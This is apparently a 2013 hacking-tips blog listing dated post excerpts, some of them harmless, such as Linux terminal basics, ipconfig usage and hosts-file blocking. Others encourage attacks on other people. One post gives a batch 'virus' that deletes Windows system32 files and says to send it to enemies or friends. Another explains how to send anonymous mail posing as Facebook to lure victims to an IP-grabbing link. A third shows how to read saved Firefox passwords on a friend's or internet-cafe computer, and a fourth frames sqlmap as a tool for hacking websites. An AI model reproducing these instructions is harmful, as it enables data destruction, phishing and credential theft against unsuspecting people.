Tuesday 31 December 2013

Preview Shortened URLs and Avoid Security Threats



Today's ubiquitous URL shorteners have seen a dramatic increase in popularity the last couple of years – much of it driven by the rise in popularity of Twitter itself. They are great for keeping character count at a minimum or to make sharing easier. Some even bring a few unique features to the table, like enabling statistics or the ability to select your own keyword, but as convenient as shorteners are they also introduce some new issues.
There's significant variance from one service to another when it comes to uptime, for example, while on the other hand given that the process involves using an HTTP redirect there’s also the latency issue. But perhaps more importantly is the fact that they obscure the target address and thus may be used to trick users to an unexpected destination.

Saturday 28 December 2013

Hack Websites Using Backtrack (Sqlmap)

In this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter.Now sqlmap is open in your terminal


2. Now find the vulnerable site. (well I already have vulnerable site)


Friday 27 December 2013

Virus Program To Destroy System



How to create prank Virus Program



Today we tell you to create a new virus program to destroy system.



Follow these steps:

  • Open Notepad.

  • Simply Type “@echo off del c:\\windows\system 32 without quotes.

  • Save this program as name.bat like virus.bat .

  • Send it to your enemies,friend via messenger


    Note: This is a virus program so make sure you do nt open it. basically this is a command to delete your system 32 files which is important.Never try it out my self LOL


    So I am not responsible for any damage.

    Monday 23 December 2013

    Introduction To Basic Terminal Commands Linux


    In this tutorial you will learn to use linux terminal. You will learn to navigate on the learn to create and remove file and much more. Most of this commands also works on Mac Os X and powershell on windows.

    What Is Terminal ?

    Backtrack 5 - Upgrade Firefox To The Latest Version

    Oh Firefox! Time for an Upgrade!


    Upgrading Firefox to the latest version. Click Applications > Internet > Firefox Web Browser


    Click on Help > About Firefox


    Saturday 21 December 2013

    Remove Windows Genuine Advantage Notificator.

    Remove Windows Genuine Error






    A single and easy way to remove the Windows Genuine Advance Notification...



  • Steps:


  • What Is Session Hijacking?Bypassing Login Using Session Stealing?

    Session Hijacking





    What is Session Hijacking?Session Hijacking is Stealing the existing active Session. The main purpose of Session Hijacking is to bypass authentication process and gain unauthorized access to the computer or Website. In simple words , hackers will login as some other client using their Sessions.


    Simple Trick To Convert Webpage To pdf

    Convert Webpages To PDF





    In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started.


    Thursday 19 December 2013

    How to block websites using hosts file?

    Block Websites Using HOSTS file




    Today let us see how to block websites using hosts file. This will helpful to administrator.

    Wednesday 18 December 2013

    4 Films That Make Hacking Cooler Than it Actually Is

    Hacking Movies



    Being a computer hacker might seem like a really cool thing. For a start, you know your way around a keyboard like Mozart on a piano. The world is your own personal playground. No information is closed off to you. The possibilities are endless.

    How To Send Anonymous Mail To Anyone | Set Up Your Own Server

    Email Hacking



    Everyone Like to send Anonymous Mail to your enemy or friend or teacher. Here is the Hacking tutorial for you to implement that. So i hope This will be best hack for you. What is the Use? I explained you in my older post how to get ip address. To get the ip address you need to send the mail with link. So You can send mail to your victim with that link such that you are contacting from an organization. For Eg: You can say we are from Facbook,we have new feature to enable the feature visit this page. How to do?

    Tuesday 17 December 2013

    How To See Passwords Behind Asterisks[No Software Needed]

    View Passwords Behind Asterisks.




  • This tricks works with every social networking sites or any other sites in which passwords when written are hidden behind asterisks.



  • Below is an example of how you can see passwords in Facebook which are hidden behind asterisks.



  • Select and highlight the passwords.




  • Change Your IP Address And Surf Anonymously

    Be Undetectable On Internet.


    When you are online unfortunately, one of the things at risk is your identity. Hackers look for ways to identify you and use personal information that's yours, usually to your detriment. However, IP address hiding can be one of the waysyou can pprotect yourself when you are online.

    If you are online a lot and share personal information, you probably already know that you are at risk for identity theft and take measures to protect yourself. But you might not know that this can happen if you're very, very careful.Ofcourse there will be peopleyou want to see your information, but unfortunately, that also puts you at risk of having it seen by those you DON'T want to see it.

    Monday 16 December 2013

    Want to find your friends IP address and location?

    Get Someone's IP Address And Location




  • Go to this address http://whatstheirip.com



  • Enter your email address in the box provided and click "Get Link".
  • Saturday 14 December 2013

    Top 10 Important command prompt's commands


    Command Prompt's



    1. ipconfig :
                      This is the top most command for seeing the ip address,subnet mask and default gateway also includes display and flush DNS cache, re-register the system name in DNS..  This will most useful tool for viewing and troubleshooting TCP/IP problem.



    • To view ip ,subnet mask address : ipconfig
    • To view all TCP/IP information, use: ipconfig /all
    • To view the local DNS cache, use: ipconfig /displaydns
    • To delete the contents in the local DNS cache, use: ipconfig /flushdns

    See Saved Passwords In Firefox


    How to see saved password in Mozilla Firefox


    This is not hacking article(not at all).However, i would say it is kind of trick that most of us not aware of.Using this trick,you can just view the "saved passwords"in the mozilla firefox.

    You remember the "Remember Password"which will be asked by Firefox whenever you successfully logged into a website?! If someone accept it,then the password will be stored locally in the firefox. What we are going to do is get that password.

    Let's say you are visiting a public internet cafe or your friend's system,you can just follow the following steps and view the save passwords.
    Steps:



  • Click the "Tools"option in menu bar.
  • Select the "Options".
  • Wednesday 11 December 2013

    [MUST-READ!] Introduction Into Becoming A Hacker.



    Introduction into Becoming a Hacker V2


    According to me when, you start hacking you need to choose what you want to hack. Here is a list of options:
    • Other computers (one of the most common options)
    • Websites (another common option)
    • Software Cracking (it is arguable to put this under the title hacking)
      Your own computer and rooting personal devices (changing things that the makers did not intend on having changed. eg. Jailbreaking iPhone's or Android, hacking OS's (operating systems))
    • Phones (Internal Systems, Credit Stealing, Apps, Free calls and texts). This is known as Phreaking.

    You don’t really need to choose one - you can try all of them, but it’s best to get good at one and move on to another. However, it is totally up to you.
    Unnecessary Note:
    Spoiler (Click to View)